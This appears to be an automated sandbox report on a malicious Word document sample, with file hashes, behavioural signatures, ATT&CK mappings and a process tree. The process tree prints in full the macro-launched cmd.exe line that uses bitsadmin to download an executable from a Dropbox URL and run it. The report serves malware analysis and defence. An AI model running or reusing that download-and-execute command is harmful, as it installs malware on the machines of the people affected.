0d8ad63d513a9b6f03056a3134b3c258610771388215e2c5e7b08233bf2b1ad6

General

Target

db1dda0772c81f143e71e55da4564d95_JaffaCakes118.doc
Size

109KB
MD5

db1dda0772c81f143e71e55da4564d95
SHA1

7217dd2c9da7dd0129fefaecd65a98561a3c4010
SHA256

0d8ad63d513a9b6f03056a3134b3c258610771388215e2c5e7b08233bf2b1ad6
SHA512

ba1f07d19e025ab42187af56f04e0b7d7dcfe74d805ded5a725acb1f4b7277ed8e791704e6876b51e6aecc9b80181c89d8e363ec898c76f45eaf2818017e571d
SSDEEP

768:p3th9csVk6tWdmUx7mOUPwAy91LSi4TSUaThfFlNGD0xz99EQ:p3pZkscv7mvPw5qi4TSlThDNGD03C

Score

10^/10

discovery dropper

Malware Config

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process	2748	1760	cmd.exe	29

Download via BitsAdmin 1 TTPs 1 IoCs

dropper

BITS Jobs

T1197

pid	Process
2120	bitsadmin.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	waitfor.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bitsadmin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Office loads VBA resources, possible macro or embedded object present

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1760	WINWORD.EXE

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
1760	WINWORD.EXE
1760	WINWORD.EXE

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 1760 wrote to memory of 2888	1760	WINWORD.EXE	30
PID 1760 wrote to memory of 2888	1760	WINWORD.EXE	30
PID 1760 wrote to memory of 2888	1760	WINWORD.EXE	30
PID 1760 wrote to memory of 2888	1760	WINWORD.EXE	30
PID 1760 wrote to memory of 2748	1760	WINWORD.EXE	31
PID 1760 wrote to memory of 2748	1760	WINWORD.EXE	31
PID 1760 wrote to memory of 2748	1760	WINWORD.EXE	31
PID 1760 wrote to memory of 2748	1760	WINWORD.EXE	31
PID 2748 wrote to memory of 2044	2748	cmd.exe	33
PID 2748 wrote to memory of 2044	2748	cmd.exe	33
PID 2748 wrote to memory of 2044	2748	cmd.exe	33
PID 2748 wrote to memory of 2044	2748	cmd.exe	33
PID 2748 wrote to memory of 2120	2748	cmd.exe	34
PID 2748 wrote to memory of 2120	2748	cmd.exe	34
PID 2748 wrote to memory of 2120	2748	cmd.exe	34
PID 2748 wrote to memory of 2120	2748	cmd.exe	34

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\db1dda0772c81f143e71e55da4564d95_JaffaCakes118.doc"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1760
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:2888
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "waitfor /t 5 YKERQ & bitsadmin /transfer UKEF /download /priority normal https://www.dropbox.com/s/zyqadrxqxq8ac0s/1qesyozananrivoxityof.exe?dl=1 %appdata%\dfvuau.exe &start %appdata%\dfvuau.exe"
  2⤵
  - Process spawned unexpected child process
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2748
- - C:\Windows\SysWOW64\waitfor.exe
    waitfor /t 5 YKERQ
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2044
- - C:\Windows\SysWOW64\bitsadmin.exe
    bitsadmin /transfer UKEF /download /priority normal https://www.dropbox.com/s/zyqadrxqxq8ac0s/1qesyozananrivoxityof.exe?dl=1 C:\Users\Admin\AppData\Roaming\dfvuau.exe
    3⤵
    - Download via BitsAdmin
    - System Location Discovery: System Language Discovery
    PID:2120

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

BITS Jobs

1

T1197

Privilege Escalation

Defense Evasion

BITS Jobs

1

T1197

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

Filesize
19KB

MD5
ff99db3d22dbfb66a152889b55174b95

SHA1
691de8b8d1fe877b6f7b75360b68076d73ee349c

SHA256
0cb3728a9a5a982948e310ebac26319e5a8625a00f04943015a6f3359ac00337

SHA512
80413a7fce5ee164fa0cf4873925813c776355bfad166e21fbe8ef114020fe8776f96380c0ff37888df80caceb4c10101716525744e152b1f9ccd3e5aa982072

Download Submit
memory/1760-18-0x0000000005D30000-0x0000000005E30000-memory.dmp

Filesize
1024KB

Download
memory/1760-2-0x000000007152D000-0x0000000071538000-memory.dmp

Filesize
44KB

Download
memory/1760-7-0x0000000005D30000-0x0000000005E30000-memory.dmp

Filesize
1024KB

Download
memory/1760-17-0x0000000005D30000-0x0000000005E30000-memory.dmp

Filesize
1024KB

Download
memory/1760-19-0x0000000005D30000-0x0000000005E30000-memory.dmp

Filesize
1024KB

Download
memory/1760-0-0x000000002FCA1000-0x000000002FCA2000-memory.dmp

Filesize
4KB

Download
memory/1760-21-0x000000007152D000-0x0000000071538000-memory.dmp

Filesize
44KB

Download
memory/1760-36-0x0000000005D30000-0x0000000005E30000-memory.dmp

Filesize
1024KB

Download
memory/1760-37-0x0000000005D30000-0x0000000005E30000-memory.dmp

Filesize
1024KB

Download
memory/1760-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1760-59-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1760-60-0x000000007152D000-0x0000000071538000-memory.dmp

Filesize
44KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads